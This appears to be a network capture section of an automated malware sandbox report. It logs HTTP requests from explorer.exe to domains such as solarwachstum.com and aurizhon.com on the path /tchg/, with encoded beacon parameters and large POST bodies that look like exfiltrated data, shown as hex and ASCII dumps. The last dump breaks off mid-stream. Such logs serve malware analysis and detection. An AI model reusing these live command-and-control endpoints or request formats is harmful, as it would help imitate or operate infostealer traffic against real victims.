                                                                                                                    Data Ascii: O0qEM=~tEulbQOVl5puLk-pq~kcsaGJo1W9e(JEGdEIuPPvQiafqZn3To4iOgh1uNeHpjPZw7Wm_LnB0C4~EEzLqiIwZb-8zSuRFlpSS5cCVorDwsy54FDg5it1AyQeWF-qlv1ktb15B9nbVKZMw4tAGV2VYJdjz538mnoBnuf3_HOim6FCSrPNB5ZL9rolbPX03BrLeKY0awjvWKWSAv4(WOyBB3hhn~0GTVrr6No(JCu9oMXgIsNY38AzfmbIuuAvQkuwGwccGVqaj6flu(0GJI5ljPqCFihhIC-(R5U(Pc6Z65Vpj(W0JvQ7RJhZ1F6rTcuiEwrJdbbA2KFviSiJ3OKhYV9wXXZCto1p1Kv9mDIB4P-SlUq(pbqnDZGVKxwuZ6xupqzzLTqOYraCc~CiJcjbx0MYkeiTAOFs1p-k4HqdsQrT7otzmDKbu8ouoUTYjB3MYGTp3Js3tNkAcAS~M2ktEhOyV(6tMQa8jTJLpJDEP6-pNQnpYv0H3uIPz3DzJQxv16djhSBI1XJIcPBNrO-59~LNdeC6Y1MGI1n(9Ywn5uAa9M_qEFQJf5ml-RNxA0VKw04Fc5sSbM68qdXLmJz8s0psE0dwXJpGM9gf2sVKjB3Vv8I~6pBKn7i0PEYkRNRv1Cga1oL1Qm7Y2VvrqqBcf6-d-28fcVqJBwzFHRF3uhdTUwZpRVyd_aWOmX8vCvhnXJN~gmnUF7osyae2ReQ6ql04F7tQ81DOcUk8kdpaQZq6ySIjrxEPLUVwWPlUqpGP7ZscrRBjkVQ4Y2hOwSAuEDsku~Kl9XA9Pg73erRXS72nz1IT1dCD7TKw_ogwwCpLu1oD26zKe3irAEyUF9XC28ILvpRUPJqqF2uKWmJaQzV8FunWCYzDV
                                                                                                                    May 30, 2023 11:10:28.234597921 CEST963OUTData Raw: 4c 2d 4e 53 47 49 28 78 51 35 75 4f 7e 68 4f 67 73 6b 33 36 7e 75 38 32 4b 76 4b 41 52 4a 30 62 51 78 55 66 52 79 7e 41 67 4d 38 4f 48 34 4c 34 4f 66 7e 71 4e 42 39 76 43 43 6a 72 74 67 77 64 69 74 53 79 4a 4f 47 70 63 30 58 4b 59 7a 4a 75 67 4a
                                                                                                                    Data Ascii: L-NSGI(xQ5uO~hOgsk36~u82KvKARJ0bQxUfRy~AgM8OH4L4Of~qNB9vCCjrtgwditSyJOGpc0XKYzJugJonIEMhqgP-qL33wjInmFwL8GYh4AnSwOnebqurkbKzXKFboRklpHXIf1qSM6AXfT3FkRpRx8GFchdBliScV9GS4Wi15p94CmVFCOxQwA1xrzyj17Bre8qkjpwxcbCp23Th7KtZG9iTpoPvngNAvcHw(K4t4-dHJqt
                                                                                                                    May 30, 2023 11:10:28.234658957 CEST970OUTData Raw: 34 63 6e 72 53 57 6c 7a 68 6c 48 58 55 42 73 75 35 58 5a 46 6a 55 31 51 4b 63 46 4a 35 39 48 5f 62 30 34 67 62 66 28 59 41 42 78 48 6c 5a 70 77 53 66 52 74 49 43 4a 75 54 63 5a 49 59 37 6b 6b 6a 4c 37 36 73 48 6e 53 6f 37 56 4f 61 7a 66 72 74 6b
                                                                                                                    Data Ascii: 4cnrSWlzhlHXUBsu5XZFjU1QKcFJ59H_b04gbf(YABxHlZpwSfRtICJuTcZIY7kkjL76sHnSo7VOazfrtkyFnllQEyfnIZKiHcOgvi6oDL33N4n96L1tA6MSuOGJXaiivw~S94jM0ah6PvQIvxslVV3hEJ5t9sd9xZw53QeCfpXXzQKECMv491GIyA5gfRfxRG0xCIwXRwwMn-m7sOB1kkiedRaxyZNlKo51peVsHoH68gDddYU
                                                                                                                    May 30, 2023 11:10:28.263580084 CEST972OUTData Raw: 5a 6a 41 46 7a 4a 32 6e 35 52 62 77 67 38 66 31 64 77 61 6a 43 32 78 67 57 63 28 5f 6b 73 69 74 61 4c 4a 66 53 66 4e 75 65 35 6d 4e 56 2d 61 45 5a 63 61 41 5a 51 4e 62 59 59 66 32 77 39 77 4e 4c 56 63 33 7a 71 66 65 59 42 5a 70 78 41 78 71 79 6d
                                                                                                                    Data Ascii: ZjAFzJ2n5Rbwg8f1dwajC2xgWc(_ksitaLJfSfNue5mNV-aEZcaAZQNbYYf2w9wNLVc3zqfeYBZpxAxqymKQglyEUDoTBqJD4p0GDROxjyuD7UajgH2OzxqrvoAed6c0SEixWJSjdQRh6cHHq7AusuF9SFmIOGrpeU1-aFgZcZ9PJ5meoihxnFagPFd47Q8emwIwopEcgiwAeEnWMLHdQ2pQyEqvFtZCm7sTy_DmVG(gDJBzZe7
                                                                                                                    May 30, 2023 11:10:28.263638973 CEST978OUTData Raw: 44 7a 55 5f 58 44 4c 4b 6e 36 65 45 6f 34 39 6b 28 33 59 63 49 51 4d 37 42 36 54 38 46 54 6f 77 4a 6f 54 48 61 57 57 33 63 69 7e 48 37 2d 79 6e 6b 31 5a 67 6f 5f 63 4d 44 37 62 49 58 4d 61 5a 67 44 44 45 48 35 37 69 66 42 36 6e 4b 6a 33 77 38 51
                                                                                                                    Data Ascii: DzU_XDLKn6eEo49k(3YcIQM7B6T8FTowJoTHaWW3ci~H7-ynk1Zgo_cMD7bIXMaZgDDEH57ifB6nKj3w8QWMifMsQ4ZIQ1mw8wpwImcphT4Hvi6JeYEqw99Ih0uP82FayaamvKGEi9rArWgY4VON12bw1nOVxwY7ZCX8(OcTPHxcEzKIOuB2nGxXWXHe0XMGM3jrEJWhAEed3WpsL-EUy_Ww6y~ICqgNoFzMZtu_xOdB2Pup~18


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    46192.168.11.204980584.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:30.779905081 CEST979OUTGET /tchg/?O0qEM=zvsOmuV0RkpNj9dmmLvcNYSUCKV3obfROWhQI5uFrAaJab0t5Tdz/8Us64BcH9fOYlnSp9W3WhuAhk0hcdTywJHY62KLeFNtHg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.aurizhon.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:10:30.808104038 CEST980INHTTP/1.1 200 OK
                                                                                                                    Server: hcdn
                                                                                                                    Date: Tue, 30 May 2023 09:10:30 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 10066
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    x-hcdn-request-id: 7ffc97c4f0df0ff6742c6cea9d2411fa-fast-edge1
                                                                                                                    Expires: Tue, 30 May 2023 09:10:29 GMT
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38
                                                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428
                                                                                                                    May 30, 2023 11:10:30.808173895 CEST981INData Raw: 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 66 64 20 33 31 2e 31 31 25 2c 23 66 66 66 20 31 36 36 2e 30 32 25 29 7d 68
                                                                                                                    Data Ascii: ;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-
                                                                                                                    May 30, 2023 11:10:30.808228970 CEST983INData Raw: 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 33 70 78 7d 2e 63 6f 6e 67 72 61 74 7a 7b 6d 61 72 67 69 6e
                                                                                                                    Data Ascii: av>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-b
                                                                                                                    May 30, 2023 11:10:30.808284998 CEST984INData Raw: 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c
                                                                                                                    Data Ascii: :16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0
                                                                                                                    May 30, 2023 11:10:30.808353901 CEST985INData Raw: 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20
                                                                                                                    Data Ascii: w><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/af
                                                                                                                    May 30, 2023 11:10:30.808413029 CEST986INData Raw: 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 46 69
                                                                                                                    Data Ascii: ccessful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosti
                                                                                                                    May 30, 2023 11:10:30.808469057 CEST988INData Raw: 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 65 6e 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20
                                                                                                                    Data Ascii: ;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=21
                                                                                                                    May 30, 2023 11:10:30.808526993 CEST989INData Raw: 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66 5d 29 2e 74 6f 55 70 70 65 72 43 61 73 65
                                                                                                                    Data Ascii: }if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toL
                                                                                                                    May 30, 2023 11:10:30.808573008 CEST989INData Raw: 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 70 61 74 68 4e 61 6d 65 29 3c 2f
                                                                                                                    Data Ascii: cument.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    47192.168.11.204980689.31.143.180C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:35.842164040 CEST991OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.solarwachstum.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.solarwachstum.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.solarwachstum.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 70 30 72 58 41 76 6c 68 79 63 66 5f 46 38 69 45 34 6d 5a 63 46 4d 53 32 43 52 4f 49 74 61 61 4b 7e 30 5a 68 58 4f 52 51 30 32 41 56 6b 54 58 69 71 31 7e 45 34 2d 42 52 4d 56 6c 50 54 4c 4f 65 67 6c 38 4f 44 62 69 46 6d 59 7a 48 5a 69 63 41 56 42 73 51 68 35 66 35 45 51 72 47 47 6a 36 36 30 67 4e 58 4d 6b 66 66 4b 71 52 39 74 70 35 36 37 66 52 41 57 63 57 72 51 43 4c 66 61 50 69 2d 49 69 42 36 73 58 30 38 53 2d 78 6e 32 59 6f 2d 34 6e 4e 47 77 75 45 45 36 55 43 6e 4b 37 61 72 32 66 62 51 67 7a 4f 61 4e 45 5a 35 71 36 36 74 53 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=p0rXAvlhycf_F8iE4mZcFMS2CROItaaK~0ZhXORQ02AVkTXiq1~E4-BRMVlPTLOegl8ODbiFmYzHZicAVBsQh5f5EQrGGj660gNXMkffKqR9tp567fRAWcWrQCLfaPi-IiB6sX08S-xn2Yo-4nNGwuEE6UCnK7ar2fbQgzOaNEZ5q66tSg).
                                                                                                                    May 30, 2023 11:10:35.853982925 CEST991INHTTP/1.1 405 Not Allowed
                                                                                                                    Date: Tue, 30 May 2023 09:10:35 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 150
                                                                                                                    Connection: close
                                                                                                                    Server: UD Forwarding 3.1
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    48192.168.11.204980789.31.143.180C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:38.369671106 CEST992OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.solarwachstum.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.solarwachstum.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.solarwachstum.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 70 30 72 58 41 76 6c 68 79 63 66 5f 47 63 53 45 7e 78 31 63 4f 4d 54 45 48 52 4f 49 6e 36 61 47 7e 31 6c 68 58 50 55 4e 30 6c 6f 56 6b 7a 48 69 74 45 7e 45 72 4f 42 52 47 31 6c 4b 65 72 4f 52 67 6c 78 7a 44 61 79 46 6d 59 58 48 5a 51 6b 41 54 78 73 54 75 5a 66 34 4f 77 72 46 43 6a 37 31 30 67 42 31 4d 6c 4c 66 4b 36 74 39 73 76 6c 36 78 75 52 48 42 73 57 79 48 53 4c 63 51 76 69 38 49 69 38 61 73 53 34 47 53 50 56 6e 32 35 45 2d 32 48 4e 42 72 4f 45 66 7a 30 43 33 4d 65 6e 44 36 65 66 7a 31 51 43 4b 4b 51 6f 64 71 35 6a 39 4a 55 66 61 55 5a 46 65 54 66 75 57 6a 4a 77 53 50 44 38 4f 42 35 77 2d 65 50 4f 33 51 73 5a 34 50 6b 4e 79 44 2d 37 4e 42 5f 7a 72 68 42 67 58 5a 7a 56 6b 42 33 66 63 6e 56 6b 70 59 33 6d 53 4f 4b 42 51 7e 7a 57 67 67 6d 63 6d 57 59 50 49 6c 4e 59 31 55 49 4f 49 57 2d 47 30 6b 7a 31 41 34 2d 32 33 63 67 79 51 42 4f 4a 32 49 57 56 58 38 66 48 37 46 55 4b 38 47 4e 52 50 47 4d 54 77 6e 65 7a 68 39 57 42 6f 55 66 4d 4e 57 30 41 56 64 65 28 6c 48 6c 4f 62 58 57 65 50 67 51 30 70 4e 4a 78 64 64 54 58 47 7a 69 54 57 55 66 76 57 6d 2d 79 61 30 76 62 63 6d 51 37 33 54 66 71 54 63 55 38 79 73 4a 4e 51 49 49 62 6b 36 35 47 7a 37 65 4d 6b 4b 44 76 38 58 45 70 59 34 62 37 44 6f 36 6f 61 34 78 4f 76 6a 61 42 68 4e 49 68 45 35 42 6b 6f 30 49 6b 2d 70 62 6a 42 66 4d 52 67 74 6c 33 67 62 4a 6b 50 4b 79 70 49 73 2d 4f 34 32 77 76 50 63 59 35 67 62 39 35 62 59 52 6b 49 7a 4e 48 77 65 54 31 46 4c 53 35 65 7a 42 4c 72 4f 78 6a 7a 36 48 7e 7a 45 45 77 38 48 75 4f 50 63 65 71 74 7a 6e 6f 4c 36 4a 62 43 51 57 71 62 5a 34 39 42 6a 41 34 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=p0rXAvlhycf_GcSE~x1cOMTEHROIn6aG~1lhXPUN0loVkzHitE~ErOBRG1lKerORglxzDayFmYXHZQkATxsTuZf4OwrFCj710gB1MlLfK6t9svl6xuRHBsWyHSLcQvi8Ii8asS4GSPVn25E-2HNBrOEfz0C3MenD6efz1QCKKQodq5j9JUfaUZFeTfuWjJwSPD8OB5w-ePO3QsZ4PkNyD-7NB_zrhBgXZzVkB3fcnVkpY3mSOKBQ~zWggmcmWYPIlNY1UIOIW-G0kz1A4-23cgyQBOJ2IWVX8fH7FUK8GNRPGMTwnezh9WBoUfMNW0AVde(lHlObXWePgQ0pNJxddTXGziTWUfvWm-ya0vbcmQ73TfqTcU8ysJNQIIbk65Gz7eMkKDv8XEpY4b7Do6oa4xOvjaBhNIhE5Bko0Ik-pbjBfMRgtl3gbJkPKypIs-O42wvPcY5gb95bYRkIzNHweT1FLS5ezBLrOxjz6H~zEEw8HuOPceqtznoL6JbCQWqbZ49BjA4.
                                                                                                                    May 30, 2023 11:10:38.381520033 CEST993INHTTP/1.1 405 Not Allowed
                                                                                                                    Date: Tue, 30 May 2023 09:10:38 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 150
                                                                                                                    Connection: close
                                                                                                                    Server: UD Forwarding 3.1
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    49192.168.11.204980889.31.143.180C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:40.901983976 CEST1006OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.solarwachstum.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.solarwachstum.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.solarwachstum.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 70 30 72 58 41 76 6c 68 79 63 66 5f 47 63 53 45 7e 78 31 63 4f 4d 54 45 48 52 4f 49 6e 36 61 47 7e 31 6c 68 58 50 55 4e 30 6a 77 56 6c 41 28 69 75 6e 57 45 6f 4f 42 52 59 6c 6c 4c 65 72 4f 4d 67 6c 6f 34 44 61 7e 7a 6d 61 66 48 5a 48 67 41 54 48 34 54 72 5a 66 37 43 51 72 48 47 6a 36 30 30 67 4e 66 4d 6c 65 6f 4b 71 4a 39 74 74 39 36 31 64 35 41 43 38 57 72 48 53 4c 51 55 76 69 4f 49 69 4a 45 73 53 30 47 53 4e 68 6e 6b 39 73 2d 34 78 46 42 78 75 45 41 38 55 43 79 46 2d 6e 6d 36 66 37 4e 31 51 43 38 4b 55 34 64 71 2d 76 39 49 58 33 64 55 35 46 65 65 5f 75 56 31 35 30 57 50 41 49 47 42 34 45 2d 65 4e 4f 33 66 73 5a 34 5a 56 4e 78 41 65 37 58 46 5f 79 70 72 68 6b 50 5a 33 31 77 42 33 4c 63 6e 44 49 70 5a 41 79 53 43 4c 42 51 68 6a 57 6d 74 47 63 50 59 34 4f 4c 6c 4e 49 70 55 49 76 5f 57 34 47 30 6e 57 42 41 36 62 61 34 4f 41 79 65 4e 75 4a 5a 4d 57 59 59 38 63 76 6e 46 55 4c 37 47 4a 70 50 47 38 6a 77 6d 66 7a 75 33 57 42 76 59 5f 4d 55 66 55 4d 54 64 65 54 54 48 6c 32 78 58 58 61 50 79 41 30 70 64 61 4a 65 56 6a 58 42 78 69 54 45 4c 76 75 41 6d 2d 76 37 30 75 66 4d 6c 67 58 33 54 76 61 54 4c 55 38 31 70 70 4e 55 52 59 62 6d 7e 35 47 7a 37 65 41 61 4b 44 6a 38 57 78 64 59 35 70 54 44 74 73 67 61 6a 78 4f 31 6a 61 41 36 4e 49 74 6e 35 42 73 43 30 49 56 72 70 64 7a 42 63 59 31 67 68 41 62 5f 4c 4a 6b 4f 64 53 70 54 68 65 53 56 32 77 6a 58 